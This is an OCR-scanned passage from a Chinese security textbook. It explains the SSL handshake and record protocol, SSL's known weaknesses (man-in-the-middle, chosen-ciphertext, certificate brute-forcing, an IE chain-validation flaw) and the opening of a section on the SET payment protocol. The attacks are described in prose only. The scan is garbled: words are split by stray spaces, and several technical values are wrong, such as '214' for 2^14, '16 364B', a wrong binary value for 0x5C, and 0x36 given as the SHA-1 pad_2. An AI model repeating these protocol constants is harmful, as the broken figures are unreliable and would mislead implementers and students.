(2) Fixed Diffie-Hellman: Diffie-Hellman 密 钥 交换 法 。 服 务 器 的 证 书 中 会 包含 经 认 
证 机 构 签 署 过 的 Diffie-Hellman 公开 密 钥 参数 。 假 如 需要 对 客户 端 做 认证 , 则 客户 端 会 将 
Diffie-Hellman 公开 密 钥 参数 包含 在 证 书 内 ,和 否则 客户 端 会 将 这 些 参数 放 在 密 钥 交换 的 消 
息 中 。 由 这 个 方法 ,使 用 固定 的 公开 密 钥 经 过 Diffie-Hellman 算法 计算 后 ,双方 会 建立 起 一 
个 固定 的 密 钥 。 

(3) Ephemeral Diffie -Hellman: 这 个 方法 是 用 来 产生 短暂 的 (Ephemeral) 密 钥 。 
Diffie-Hellman 公开 密 钥 会 利用 传送 者 私人 RSA 密 钥 或 者 是 DSS 密 钥 来 做 签署 ,并 且 互 相 
交换 。 而 接收 者 随后 便 能 使 用 对 应 的 公开 密 钥 来 核对 这 个 签名 。 除 此 之 外 ,接收 者 也 能 利 
用 证 书 来 确认 公开 密 钥 的 真实 性 ,这 将 会 是 Diffie-Hellman 三 种 选择 方式 中 最 安全 的 一 种 ， 
因为 它 所 产生 的 是 一 把 短暂 并 且 经 过 验证 的 密 钥 。 

(4) Anonymous Diffie-Hellman: 基本 上 使 用 Diffie-Hellman 算法 ,但 是 不 经 过 认证 。 
也 就 是 说 ,双方 都 会 将 自己 的 Diffie-Hellman 公开 参数 在 没有 经 过 认证 的 程序 下 ,直接 传送 
给 对 方 。 这 个 方式 很 有 可 能 受到 中 间 人 攻击 (man-in-the-middle attack) ,攻击 者 可 以 向 双 
方 发 起 匿名 的 Diffie-Hellman 交换 攻击 。 

(5) Fortezza: 在 Fortezza 架构 中 所 定义 的 方法 。 

CipherSpec 参数 包含 以 下 这 些 字段。 

(1) CipherAlgorithm: 加 密 算法 。 如 RC4,RC2,DES,3DES,DES40,IDEA ,Fortezza。 

(2) MACAlgorithm: 消息 认证 算法 。MD5 或 是 SHA-1。 

(3) CipherType: 加 密 类 型 。 串 流 式 或 区 块 式 。 

(4) IsSExportable: 真 或 伪 。 

(5) HashSize: Hash 值 长 度 。16 字 节 (使 用 MD5 时 ) 或 20 字 节 (使 用 SHA-1 时 )。 

(6) Key Material: 用 来 产生 写 入 密 钥 的 数据 。 

(7) IV size: CBC 加 密 模式 中 ,初始 向 量 的 长 度 。 


2. 服务 器 认证 与 密 钥 交 换 


当 服 务 器 送出 server_hello 消息 后 ,或 客户 端 需要 验证 服务 器 的 身份 时 ,服务 器 可 以 将 
其 证 书 资料 传送 给 客户 端 , 它 可 能 是 单一 (同一 领域 ) 或 者 是 一 连 串 的 ( 跨 领 域 )X. 509 证 书 。 
除了 使 用 匿名 Diffie-Hellman 密 钥 交换 算法 ,任何 一 种 密 钥 交换 程序 都 需要 一 个 证 书 消息 
(Certificate Message) 。 请 注意 ,假如 使 用 fixed Diffie-Hellman 法 , 则 这 个 证 书 消息 的 功能 
就 如 同 服务 器 的 密 钥 交换 消息 ,因为 此 消息 包含 了 服务 器 的 Diffie-Hellman 公开 参数 值 。 

接着 ,假如 有 需要 的 话 ,服务 器 会 送出 server_key_exchange 消息 。 在 下 面 的 两 种 情况 
下 ,服务 器 不 需要 送出 这 个 消息 : 服务 器 已 经 送出 包含 fixed Diffie-Hellman 参数 的 证 书 ; 
使 用 RSA 密 钥 交换 算法 。 


3. 客户 端 认 证 与 密 钥 交换 
当 客 户 端 收 到 服务 器 送出 的 server_done 消息 后 ,首先 ,假如 有 需要 的 话 ,客户 端 应 该 
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核对 服务 器 提供 的 证 书 是 否 正确 ,接着 再 确认 server_done 消息 中 所 携带 的 参数 是 否 能 够 
接受 。 如 果 这 些 都 能 满足 的 话 , 则 客户 端 会 响应 一 个 或 多 个 消息 给 服务 器 。 

如 果 之 前 服务 器 发 出 certificate_request 消息 ,要 求 客 户 端 送出 自己 的 证 书 ,那么 客户 
端 就 得 先 响应 一 个 certificate 消息 给 服务 器 。 如 果 客 户 端 没有 适当 的 证 书 可 以 提供 , 则 会 
改 送 一 个 no_certificate 消息 给 服务 器 。 

接着 ,下 一 个 交换 的 消息 是 client_key_exchange 消息 。 在 第 三 阶段 中 ,一 定 要 送出 这 
个 消息 ,至 于 其 内 容 则 要 看 客户 端 所 选 定 的 公开 密 钥 算法 类 型 而 定 , 如 : 

(1) RSA: 客户 端 先 产 生 一 个 48 B 长 的 pre-master secret。 然 后 , 若 服务 器 提供 其 他 的 
证 书 , 则 利用 此 证 书 内 的 公开 密 钥 将 此 密 钥 加 密 , 不 然 就 用 server_key_exchange 消息 中 携 
带 的 暂时 性 RSA 密 钥 来 加 密 。 这 个 “预先 的 ” 密 钥 能 够 用 来 产生 master secret。 

(2) Ephemeral 或 Anonymous Diffie-Hellman: 车 使 用 这 两 种 算法 , 则 客户 端 传送 自己 
的 公开 Diffie-Hellman 参数 。 

(3) Fixed Diffie-Hellman: 若 使 用 这 种 算法 , 则 之 前 客户 端 在 传送 证 书 消息 时 ,就 已 经 
包含 了 自己 的 公开 Diffie-Hellman 参数 。 所 以 client_key_exchange 消息 这 时 内 容 就 会 是 
空 的 。 

(4) Fortezza: 客户 端 传送 自己 的 Fortezza 参数 。 

若 之 前 客户 端 需要 传送 自己 的 证 书 , 则 在 这 个 阶段 的 最 后 , 它 也 会 连带 送出 一 个 
certificate_verify 消息 给 服务 器 ,以 便 提供 此 证 书 的 明确 证 明 , 而 这 个 证 明 就 是 一 个 根据 之 
前 消息 所 计算 出 的 Hash 值 。 这 个 消息 只 有 客户 端 证 书 拥 有 签名 能 力 时 (除了 那些 包含 
fixed Diffie-Hellman 参数 的 证 书 以 外 的 所 有 证 书 ) , 才 会 跟着 送出 。 因 此 消息 会 对 此 Hash 
值 做 签名 ,定义 如 下 : 

CertificateVerify. signature. md5_hash 

MD5 (master_secret || pad 2 || MD5(handshake messages | master-secret || pad_1)); 

Certificate. signature. sha_hash 

SHA(master_secret | pad 2 | SHA(handshake messages || master-secret || pad_1)); 

其 中 ,pad_1 与 pad_2 就 是 之 前 为 MAC 所 定义 的 值 。 从 client_hello 消息 开始 后 ,所 有 通过 
Handshake 协议 所 传送 或 接收 的 消息 都 属于 handshake_messages。master_secret 是 一 个 
经 过 计算 的 密 钥 。 假 如 使 用 者 的 数字 签名 是 DSS, 则 这 个 密 钥 将 会 被 用 来 加 密 SHA-1 Hash 
值 串 接 后 的 结果 。 不 管 哪 一 种 情形 ,其 目的 都 是 希望 利用 客户 端的 证 书 来 核对 客户 端 是 否 
拥有 正确 的 私 钥 。 就 算 有 人 滥用 客户 端的 证 书 , 因 为 他 没有 正确 的 客户 端 私 钥 , 所 以 也 没有 
办 法 送出 这 个 certificate_verify 消息 。 


4. 完成 


这 个 阶段 完成 了 建立 一 条 安全 连接 所 应 该 做 的 设 定 工作 。 客 户 端 会 送出 一 个 change_ 
cipher_spec 消息 ,并且 将 目前 的 密码 套件 状态 更 新 成 即将 要 使 用 的 密码 套件 状态 。 请 注 
意 ,这 个 消息 并 不 属于 Handshake 协议 的 一 部 分 ,而 是 利用 加 密 算法 修正 协议 所 送出 的 消 
。 紧 接着 ,客户 端 利用 之 前 与 服务 器 协议 而 得 到 的 算法 、 密 钥 , 来 传送 最 后 的 finished 消 
。 这 个 消息 用 来 证 明 密 钥 交 换 以 及 认证 的 过 程 已 经 顺利 完成 ,其 内 容 包 含 两 个 Hash 值 : 


MD5 (master_secret || pad 2 || MD5(handshake messages | Sender | master-secret | pad_1)); 


证 省 
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SHA(master_secret || pad 2 | SHA(handshake messages || Sender | master-secret | pad_1)); 


其 中 ,Sender 是 一 个 代码 ,用 来 表示 此 消息 为 客户 端 所 发 出 。 除 了 这 个 finished 消息 以 外 ， 
handshake_messages 包含 所 有 经 由 handshake 消息 所 传送 的 数据 。 

为 了 响应 这 两 个 消息 ,服务 器 会 传送 自己 的 change_cipher_spec 消息 ,并 且 将 目前 的 密 
码 套 件 状态 更 新 为 即将 要 使 用 密码 套件 状态 ,最 后 再 送出 finished 消息 。 当 这 些 handshake 
的 步骤 都 完成 后 ,客户 端 与 服务 器 就 能 开始 传送 应 用 层 的 数据 了 。 


1334 SSL 记录 协议 


SSL 记录 协议 为 每 一 个 SSL 连接 提供 以 下 两 种 服务 。 

(1) 机 密 性 (Confidentiality) : SSL 记录 协议 会 协助 双方 产生 一 把 共有 的 密 钥 ,利用 这 
把 密 钥 来 对 SSL 所 传送 的 数据 做 传统 式 加 密 。 

(2) 消息 完整 性 (Message Integrity): SSL 记录 协议 会 协助 双方 产生 另 一 把 共有 的 密 
钥 ,利用 这 把 密 钥 来 计算 出 消息 认证 码 。 

图 13-13 展示 了 SSL 记录 协议 大 致 的 操作 流程 。 记 录 协 议 接收 到 应 用 程序 所 要 传送 的 
消息 后 ,会 将 消息 内 的 数据 切 成 容易 管理 的 小 区 块 ( 分 片 ), 然 后 选择 是 否 对 这 些 区 块 作 压 
缩 ,再 加 上 此 区 块 的 消息 认证 码 。 接 着 将 数据 区 块 与 MAC 一 起 做 加 密 处 理 , 加 上 SSL 记录 
头 后 通过 TCP 传送 出 去 。 接 收 数据 的 那 一 方 则 以 解释 、 核 查 、 解 压缩 ,及 重组 的 步骤 将 消息 
的 内 容 还 原 ,传送 给 上 层 使 用 者 。 


Application data 


Fragment 


Compress 


Add MAC 


Encrypt 


Append SSL 时 二 
record header ~ 


E 


图 13-13 ”SSL 记录 协议 运作 模式 


第 一 个 步骤 是 分 片 (Fragmentation) 。 每 一 个 上 层 想 要 通过 SSL 传送 的 消息 都 会 被 切 
割 成 最 多 214B( 或 者 是 16 364B) 大 小 的 分 片 ,接着 ,可 以 选择 是 否 执行 压缩 CCompression) 
的 步骤。 压缩 的 过 程 中 ,必须 是 无 损失 (Lossless) 压 缩 , 也 就 是 说 解压 缩 后 能 够 得 到 原本 完 
整 的 消息 。 除 此 之 外 ,经 过 压缩 后 的 内 容 长 度 不 能 超过 原 有 长 度 1024 字 节 以 上 (当然 ,我 们 
希望 压缩 后 的 数据 能 够 更 小 ,而 不 是 增多 。 但 对 于 有 些 长 度 非常 小 的 分 片 来 说 ,可 能 因为 压 
缩 算法 格式 上 的 要 求 , 压 缩 过 后 的 结果 会 比 原来 数据 还 长 )。 在 SSL v3( 以 及 TLS 的 现 有 
版 本 ) ,并 没有 指定 压缩 算法 ,所 以 预 设 的 加 算法 是 null。 

接 下 来 的 处 理 步骤 为 计算 压缩 数据 的 消息 认证 码 。 为 了 达到 这 个 目的 ,必须 使 用 一 把 
双方 共有 的 密 钥 。 消 息 认 证 码 的 计算 过 程 定义 如 下 : 

hash (MAC _ write _ secrte | pad _1 | seq mum || SSLCompressed. type | 
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SSLCompressed. length | SSLCompressed. fragment) ,其 中 ,各 符号 和 参数 的 意义 如 下 。 

(1) | : 表示 串 接 。 

(2) MAC write_secrte: 共有 的 密 钥 。 

(3) Hash: 使 用 到 密码 的 杂凑 算法 ; MD5 或 者 SHA-1。 

(4) pad_1: 若是 使 用 MD5 , 则 为 0x36(00110110) 字 节 重 复 48 次 的 384 位 分 片 ,若是 用 
SHA-1, 则 为 0x36 重复 40 次 的 320 位 分 片 。 

(5) pad_2: 若是 使 用 MD5, 则 为 0x5C(01010110) 字 节 重 复 48 次 的 384 位 分 片 ,若是 
用 SHA-1, 则 为 0x36 重复 40 次 的 320 位 分 片 。 

(6) seq_mum: 这 个 消息 的 序列 号 码 。 

(7) SSLCompressed. type: 用 来 处 理 这 个 分 片 的 上 层 协 议 。 

(8) SSLCompressed. length: 分 片 经 过 压缩 过 后 的 长 度 。 

(9) SSLCompressed. fragment: 经 过 压缩 后 的 分 片 (假如 没有 经 过 压缩 这 个 步骤 , 则 代 
表明 文 分 片 ) 。 

接着 ,压缩 过 后 的 数据 会 连同 MAC 一 起 做 对 称 加 密 。 加 密 后 的 数据 长 度 最 多 只 能 比 
加 密 前 多 1024B, 因 此 ,连同 压缩 以 及 加 密 的 过 程 处 理 完 后 ,整个 数据 块 长 度 不 会 超过 
(214 十 2048)B。 

SSL 记录 协议 最 后 的 步骤 便 是 准备 一 个 记录 头 , 这 个 记录 头 包 含 以 下 的 字段 。 

(1) 数据 类 型 (Content type) ,8 位 : 用 来 处 理 这 个 分 片 的 上 层 协 议 。 

(2) 主要 版 本 号 (Major Version) ,8 位 : 所 使 用 的 SSL 协议 的 主要 版 本 ,对 于 SSL v3 
协议 来 说 ,这 个 字段 值 为 3。 

(3) 次 要 版 本 号 (Minor Version) ,8 位 : 表示 使 用 的 次 要 版 本 ,对 于 SSL v3 协议 来 说 ， 
这 个 字段 值 为 0。 

(4) 压缩 后 数据 长 度 (Compressed length) ,16 位 : 这 个 明文 分 片 的 长 度 (假如 此 分 片 已 
经 过 压缩 , 则 为 压缩 后 的 长 度 )。 最 大 值 为 (214 十 2048)B。 

已 定义 的 数据 类 型 包含 Change_cipher_spec、alert、handshake, 以 及 application_data。 
前 三 种 数据 类 型 为 SSL 所 定义 的 协议 。 请 注意 ,上 层 各 种 使 用 SSL 的 应 用 程序 对 于 SSL 
来 说 并 没有 什么 差别 ,因为 SSL 无 法 了 解 这 些 应 用 程序 所 产生 的 数据 的 意义 。 


1335 SSL 协 议 安全 性 分 析 


SSL 协议 是 为 解决 数据 传输 的 安全 问题 而 设计 的 ,实践 也 证 明了 它 针对 窃听 和 其 他 的 
被 动 攻 击 相当 有 效 , 但 是 由 于 协议 本 身 的 一 些 缺 陷 以 及 在 使 用 过 程 中 的 不 规范 行为 ,SSL 
协议 仍然 存在 不 可 忽略 的 安全 脆弱 性 。 


1. SSL 协议 自身 的 缺陷 


1) 客户 端 假冒 

因为 SSL 协议 的 设计 初 训 是 对 Web 站 点 及 网 上 交易 进行 安全 性 保护 ,使 消费 者 明白 
正在 和 谁 进 行 交易 要 比 使 商家 知道 谁 正在 付费 更 为 重要 ,为 了 不 至 于 由 于 安全 协议 的 使 用 
而 导致 网 络 性 能 大 幅 下 降 , SSL 协议 并 不 是 默认 地 要 求 进行 客户 认证 ,这 样 做 虽然 有 悖 于 
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安全 策略 ,但 却 促进 了 SSL 的 广泛 应 用 。 针 对 这 个 问题 ,可 在 必要 的 时 候 配置 SSL 协议 ,使 
其 选择 对 客户 端 进行 认证 鉴别 。 

2) SSL 协议 无 法 提供 基于 UDP 应 用 的 安全 保护 

SSL 协议 需要 在 握手 之 前 建立 TCP 连接 ,因此 不 能 对 UDP 应 用 进行 保护 。 如 果 要 兼 
顾 UDP 协议 层 之 上 的 安全 保护 ,可 以 采用 IP 层 的 安全 解决 方案 。 

3) SSL 协议 不 能 对 抗 通信 流量 分 析 

由 于 SSL 只 对 应 用 数据 进行 保护 ,数据 包 的 IP 头 和 TCP 头 仍然 暴露 在 外 ,通过 检查 
没有 加 密 的 IP 源 和 目的 地 址 以 及 TCP 端口 号 或 者 检查 通信 数据 量 ,一 个 通信 分 析 者 依然 
可 以 揭示 哪 一 方 在 使 用 什么 服务 ,有 时 甚至 能 推导 出 商业 或 私人 关系 。 然 而 用 户 一 般 都 对 
这 个 攻击 不 太 在 意 , 所 以 SSL 的 研究 者 们 并 不 打算 去 处 理 此 问题 。 

4) 针对 基于 公 钥 加 密 标 准 (PKCS) 协 议 的 自 适应 选择 密 文 攻击 

由 于 SSL 服务 器 用 一 个 比特 标识 来 回答 每 条 消息 是 不 是 根据 PKCS# 1 正确 地 加 密 和 
编码 ,攻击 者 可 以 发 送 任意 数量 的 随机 消息 给 SSL 服务 器 ,再 达到 选择 密 文 攻击 的 目的 。 
最 广泛 采用 的 应 对 措施 就 是 进行 所 有 三 项 检查 而 不 发 送 警示 ,不 正确 时 直接 丢弃 。 

5) 进程 中 的 主 密 钥 泄 露 

除非 SSL 的 工程 实现 大 部 分 驻 留 在 硬件 中 ,和 否则 主 密 钥 将 会 存留 在 主机 的 主 存储 器 
中 ,这 就 意味 着 任何 可 以 读 取 SSL 进程 存储 空间 的 攻击 者 都 能 读 取 主 密 钥 ,这 个 问题 要 依 
靠 用 户 管理 策略 来 解决 。 

6) 磁盘 上 的 临时 文件 可 能 遭受 攻击 

对 于 使 用 虚拟 内 存 的 操作 系统 ,不 可 避免 地 有 些 敏感 数据 其 至 主 密 钥 都 交换 到 磁盘 上 ， 
可 采取 内 存 加 锁 和 及 时 删除 磁盘 临时 文件 等 措施 来 降低 风险 。 


2. 不 规范 应 用 引起 的 问题 


1) 对 证 书 的 攻击 和 窃取 

公共 CA 机 构 并 不 总 是 可 靠 的 ,系统 管理 员 经 常 犯 的 错误 是 过 于 信任 这 样 的 公共 CA 
机 构 。 因 为 对 于 用 户 的 证 书 , 公 共 CA 机 构 可 能 不 像 对 网 站 数字 证 书 那样 重视 和 关心 其 准 
确 性 。 由 于 微软 公司 的 IIS 服务 器 提供 了 “客户 端 证 书 映射 "功能 ,用 于 将 客户 端 提 交 证 书 
中 的 名 字 映 射 到 NT 系统 的 用 户 账号 ,在 这 种 情况 下 黑客 就 有 可 能 获得 该 主机 的 系统 管理 
员 权 限 。 如 果 黑 客 不 能 利用 上 面 的 非法 的 证 书 突破 服务 器 ,他 们 还 可 以 尝试 暴力 攻击 。 虽 
然 暴 力 攻击 证 书 比 暴力 攻击 口令 更 为 困难 ,但 仍然 是 一 种 攻击 方法 。 要 暴力 攻击 客户 端 认 
证 ,黑客 编辑 一 个 可 能 的 用 户 名 字 列 表 , 然 后 为 每 一 个 名 字 向 CA 机 构 申请 证 书 。 每 一 个 证 
书 都 用 于 尝试 获取 访问 权限 。 用 户 名 的 选择 越 好 ,其 中 一 个 证 书 被 认可 的 可 能 性 就 越 高 。 
暴力 攻击 证 书 的 方便 之 处 在 于 它 仅 需要 猜测 一 个 有 效 的 用 户 名 ,而 不 是 猜测 用 户 名 和 口令 ; 
除 此 之 外 ,黑客 还 可 能 窃取 有 效 的 证 书 及 相应 的 私 钥 。 最 简单 的 方法 是 利用 特洛伊 木马 ,这 
种 攻击 几乎 可 使 客户 端 证 书 形同虚设 。 对 付 这 种 攻击 的 唯一 有 效 方法 或 许 是 将 证 书 保存 到 
智能 卡 或 令 牌 之 类 的 设备 中 。 

2) 中 间 人 攻击 

SSL 可 以 允许 多 种 密 钥 交换 算法 ,而 有 些 算法 ,如 DH, 没有 证 书 的 概念 ,这 样 便 无 法 验 
证 对 方 的 公 钥 和 身份 的 真实 性 ,从 而 攻击 者 可 以 轻易 地 冒充 ,用 自己 的 密 钥 与 双方 通信 ,从 
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而 窃听 到 别人 谈话 的 内 容 。 而 为 了 防止 中 间 人 攻击 ,应 该 采用 有 证 书 的 密 钥 交换 算法 。 

即使 采用 了 有 证 书 的 密 钥 交换 算法 ,攻击 者 还 可 以 从 与 服务 器 握手 过 程 中 获得 一 些 内 
容 , 用 于 伪造 一 个 与 服务 器 非常 相似 的 证 书 , 这 样 , 当 攻 击 者 以 中 间 人 的 形式 与 用 户 进行 连 
接 时 ,虽然 客户 程序 能 够 识别 并 提出 警告 ,但 仍然 有 相当 多 的 用 户 被 迷惑 而 遭 到 攻击 。 只 要 
用 户 有 一 定 的 警惕 性 ,是 可 以 避免 这 种 攻击 的 。 

3) 安全 盲点 

系统 管理 员 不 能 使 用 现 有 的 安全 漏洞 扫描 或 用 网 络 人 侵 检测 系统 来 审查 或 监控 网 络 上 
的 SSL 交易 。 网 络 人 侵 检测 系统 是 通过 监测 网 络 传输 来 寻找 未 授权 的 活动 ,任何 符合 已 知 
的 攻击 模式 或 者 未 经 授权 的 网 络 活动 都 被 标记 起 来 以 供 审计 ,其 前 提 是 IDS 必须 能 监视 所 
有 的 网 络 流量 信息 ,但 是 SSL 的 加 密 技 术 却 使 得 通过 网 络 传输 的 信息 无 法 让 IDS 辨认 。 这 
样 , 既 没 有 网 络 监测 系统 又 没有 安全 审查 ,使 得 最 重要 的 服务 器 反而 成 为 受到 最 少 防护 的 服 
务 器 。 对 此 ,恶意 代码 检测 ,增强 的 日 志 功 能 等 基于 主机 的 安全 策略 会 成 为 最 后 防线 。 

4) IE 浏览 器 的 SSL 身份 鉴别 缺陷 

通常 情况 下 ,用 户 在 鉴别 对 方 身份 时 根据 证 书 链 对 证 书 逐 级 验证 ,如 果 存 在 中 间 CA， 
还 应 检查 所 有 中 间 证 书 是 否 拥有 合法 的 CA Basic Constraints, 这 种 情况 下 攻击 者 不 可 能 进 
行 中 间 人 攻击 ,但 实际 上 IE 5.0、5.5、6.0 浏览 器 对 是 否 拥有 合法 的 CA Basic Constraints 
并 不 做 验证 ,所 以 攻击 者 只 要 有 任何 域 的 合法 的 CA 签发 证 书 ,就 能 生成 其 他 任何 域 的 合法 
CA 签发 证 书 , 从 而 导致 中 间 人 攻击 。 对 此 可 以 给 IE 打 补 丁 , 也 可 以 使 用 Netscape 4. x 或 
Mozilla 浏览 器 ,对 于 一 些 非常 敏感 的 应 用 ,建议 在 进行 SSL 连接 时 手工 检查 证 书 链 , 如 果 
发 现 有 中 间 证 书 , 可 以 认为 正在 遭受 中 间 人 攻击 ,立即 采取 相应 保护 措施 。 

另外 , 巾 于 美国 密码 出 口 的 限制 ,IE、Netscape 等 浏览 器 所 支持 的 加 密 强 度 很 弱 。 如 果 
只 采用 浏览 器 自 带 的 加 密 功能 的 话 , 理 论 上 存在 被 破解 的 可 能 。 所 以 ,关键 的 系统 、 核 心 的 
技术 应 该 拥有 自主 的 知识 产权 。 

总 的 来 说 ,SSL 不 失 为 一 套 全 面 完 善 的 安全 策略 中 有 效 的 组 成 元 素 。 然 而 ,与 网 络 安 
全 的 其 他 工具 软件 一 样 , 仅 使 用 单一 的 防护 软件 都 是 远 远 不 够 的 。 对 SSL 的 过 高 评价 有 可 
能 带 来 高 的 安全 风险 , 它 仅 仅 是 网 络 安 全 工具 的 一 种 ,必须 和 其 他 网 络 安全 工具 紧密 结合 ， 
方 能 构造 出 全 面 、 完 善 、 安 全 可 靠 的 网 络 。 


134 安全 电子 交易 协议 


安全 电子 交易 (Secure Electronic Transaction,SET) 协 议 是 由 VISA 和 Master Card 两 
大 信用 卡 公司 联合 推出 的 规范 。SET 主要 是 为 了 解决 用 户 .商家 和 银行 之 间 通 过 信用 卡 支 
付 的 交易 而 设计 的 ,以 保证 支付 命令 的 机 密 、 支 付 过 程 的 完整 .商户 及 持 卡 人 的 合法 身份 ,以 
及 可 操作 性 。SET 中 的 核心 技术 主要 有 公 钥 加 密 、 数 字 签名 数字 信封 .数字 证 书 等 。SET 
协议 比 SSL 协议 复杂 ,因为 前 者 不 仅 加 密 两 个 端点 间 的 单个 会 话 , 它 还 可 以 加 密 和 认定 三 
方 间 的 多 个 信息 。SET 是 应 用 层 的 安全 协议 。 
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1341 SET 协议 概述 


在 开放 的 互联 网 上 处 理 电子 商务 ,如 何 保证 买卖 双方 传输 数据 的 安全 成 为 电子 商务 能 
否 普及 的 最 重要 的 问题 。 为 了 克服 SSL 安全 协议 的 缺点 ,两 大 信用 卡 组 织 ,Visa 和 Master 
Card 联合 开发 了 SET 电子 商务 交易 安全 协议 。 这 是 一 个 为 了 在 互联 网 上 进行 在 线 交 易 而 
设立 的 开放 的 以 电子 货币 为 基础 的 电子 支付 系统 规范 。SET 在 保留 对 客户 信用 卡 认证 的 
前 提 下 ,又 增加 了 对 商家 身份 的 认证 ,这 对 于 需要 支付 货币 的 交易 来 讲 是 至 关 重 要 的 。 

安全 电子 交易 协议 是 基于 互联 网 的 卡 基 支付 和 授权 业务 信息 传输 的 安全 标准 , 它 采 取 
RSA 公开 密 钥 体系 对 通信 双方 进行 认证 ,利用 DES、RC4 或 任何 标准 对 称 加 密 方法 进行 信 
息 的 加 密 传输 ,并 用 Hash 算法 来 鉴别 消息 真 伪 或 有 无 算 改 。 在 SET 体系 中 有 一 个 关键 的 
认证 机 构 , 认 证 机 构 根 据 X. 509 标准 发 布 和 管理 证 书 。 


1. SET 提供 的 服务 


SET 本 身 并 不 是 一 个 付费 的 系统 。 相 反 地 , 它 是 一 套 安全 协议 和 格式 ,让 使 用 者 能 够 
在 现 有 的 用 卡 付费 机 制 中 ,以 安全 方式 在 公开 的 环境 中 做 交易 。SET 提供 了 以 下 的 服务 。 

(1) 给 所 有 参与 交易 的 每 一 方 提供 一 个 安全 的 通信 管道 。 

(2) 使 用 X. 509 v3 数字 证 书 来 提供 可 信赖 的 服务 。 

(3) 确保 交易 的 隐秘 性 。 唯 有 必要 的 时 候 , 才 会 在 必要 的 场所 提供 给 交易 双方 所 需 的 
信息 。 

SET 是 一 种 复杂 的 机 制 ,由 1997 年 5 月 发 行 的 三 本 书 来 定义 。 

(1) Book1: 商业 的 说 明 , 共 80 页 。 

(2) Book2: 程序 设计 者 手册 , 共 629 页 。 

(3) Book3: 正规 化 协议 定义 , 共 262 页 。 


2. SET 的 安全 功能 


SET 交易 分 为 三 个 阶段 : 第 一 阶段 为 购买 请 求 阶段 , 持 卡 人 与 商家 确定 所 用 支付 方式 
的 细节 ; 第 二 阶段 是 支付 的 认定 阶段 ,商家 与 银行 核实 , 随 着 交易 的 进行 ,他 们 将 得 到 支付 ; 
第 三 阶段 为 收 款 阶 段 ,商家 向 银行 出 示 所 有 交易 的 细节 ,然后 银行 以 适当 方式 转移 货款 。 

在 整个 交易 过 程 中 , 持 卡 人 只 和 第 一 阶段 有 关 ,银行 与 第 二 、 第 三 阶段 有 关 ,而 商家 与 三 
个 阶段 都 要 发 生 联 系 。 每 个 阶段 都 要 使 用 不 同 的 加 密 方法 对 数据 加 密 , 并 进行 数字 签名 。 
使 用 SET 协议 ,在 一 次 交易 中 ,要 完成 多 次 加 密 与 解密 操作 , 故 要 求 商家 的 服务 器 要 有 很 高 
的 处 理 能 力 。 

SET 协议 保证 了 电子 交易 的 机 密 性 数据 完整 性 .身份 的 合法 性 和 不 可 否认 性 。 

(1) 机 密 性 。SET 协议 采用 公 钥 密码 算法 来 保证 传输 信息 的 机 密 性 ,以 避免 Internet 
上 任何 有 关 或 无 关 的 窥探 。 公 和 钥 算法 允许 任何 人 使 用 接收 方 的 公 钥 把 加 密 信息 发 送 给 指定 
的 接收 者 ,接收 者 收 到 密 文 后 ,使 用 密 钥 对 这 个 信息 解密 ,因此 只 有 指定 的 接收 者 才能 解读 
这 个 信息 ,从 而 保证 信息 的 机 密 性 。SET 协议 也 可 以 通过 双重 签名 的 方法 ,将 信用 卡 信息 
直接 从 持 卡 人 通过 商家 发 送 到 商家 的 开户 行 ,而 不 容许 商家 访问 客户 的 账号 信息 ,这 样 客 户 
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在 消费 时 可 以 确信 其 信用 卡号 没有 在 传输 过 程 中 被 窥探 ,而 接受 SET 交易 的 商家 因为 没有 
访问 信用 卡 信息 , 故 免 去 了 在 其 数据 库 中 保存 信用 卡号 的 责任 。 

(2) 数据 完整 性 。 通 过 SET 协议 发 送 的 信息 经 过 加 密 后 ,将 为 其 产生 一 个 唯一 的 报 文 
消息 摘要 值 (message digest) ,一 旦 有 人 企图 自 改 报 文中 包含 的 数据 ,接收 方 重新 计算 出 的 
摘要 值 就 会 改变 ,从 而 被 检测 到 ,这 就 保证 了 信息 的 完整 性 。 

(3) 身份 认证 。SET 协议 可 使 用 数字 证 书 来 确认 交易 涉及 的 各 方 (包括 商家 、 持 卡 人 、 
收 单 银行 和 支付 网 关 ) 的 身份 ,为 在 线 交易 提供 一 个 完整 的 可 信赖 环境 。 

(4) 不 可 否认 性 。SET 交易 中 的 数字 证 书 的 发 布 过 程 包含 了 商家 和 持 卡 人 在 交易 中 的 
信息 。 因 此 ,如 果 持 卡 人 用 SET 发 出 一 个 商品 的 订单 ,在 收 到 货物 后 他 不 能 否认 发 出 过 这 
个 订单 。 同 样 ,商家 也 不 能 否认 收 到 过 这 个 订单 。 

综观 SET 的 这 些 功 能 ,可 以 看 出 其 融合 了 以 下 的 特色 。 

(1) 信息 可 靠 度 ; 持 卡 人 账户 及 付费 信息 ,在 网 络 上 传输 的 过 程 中 ,要 保持 其 安全 。 
SET 有 一 个 重要 的 特征 , 即 SET 可 以 预防 特约 商店 偷偷 记录 持 卡 人 的 信用 卡 卡号 ; 信用 卡 
卡号 只 有 发 卡 银行 才能 提供 。 而 传统 的 DES 加 密 法 就 可 以 用 来 提供 信用 卡 卡号 的 保密 性 。 

(2) 数据 的 完整 性 : 在 特约 商店 与 持 卡 人 之 间 传 送 的 支付 命令 包括 认购 信息 ,个 人 数 
据 , 以 及 支付 指令 。SET 保证 这 些 信息 在 传输 的 过 程 中 不 会 遭 到 更 改 。 运 用 SHA-1 Hash 
值 的 RSA 数字 签名 可 以 提供 信息 的 完整 性 。 

(3) 持 卡 人 账户 的 认证 : SET 让 特约 商店 可 以 辨别 持 卡 人 是 否 为 一 个 正确 信用 卡 账户 
的 合法 使 用 者 。SET 运用 X. 509 v3 数字 证 书 及 RSA 签名 达到 这 个 目的 。 

(4) 特约 商店 的 认证 : SET 可 以 让 持 卡 人 核对 是 否 特 约 商店 与 金融 机 构 有 合作 关系 以 
接受 付 账 。SET 使 用 X. 509 v3 数字 证 书 与 RSA 签名 ,以 提供 这 样 的 认证 服务 。 


1342 SET 交易 的 参与 者 


一 般 来 说 ,在 SET 规范 的 交易 模式 中 ,所 参与 的 个 体 包括 持 卡 人 ,特约 商店 、 发 卡 行 、 收 
单行 支付 网 关 、 认 证 中 心 等 ,通过 这 些 成 员 和 相关 软件 , 即 可 在 Internet 上 构造 符合 SET 
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1. 持 卡 人 (Cardholder) 


在 电子 化 环境 中 ,消费 者 通过 因特网 与 特约 商店 之 间 互 动 。 而 持 卡 人 是 拥有 发 卡 行 授 
权 许 可 的 信用 卡 (如 MasterCard、Visa) 持 有 人 。 持 卡 人 要 参加 SET 交易 ,必须 要 有 一 台 
够 上 网 的 计算 机 ,还 必须 到 发 卡 行 去 申请 一 套 SET 交易 的 持 卡 人 软件 ,一 般 称 之 为 电子 钱 
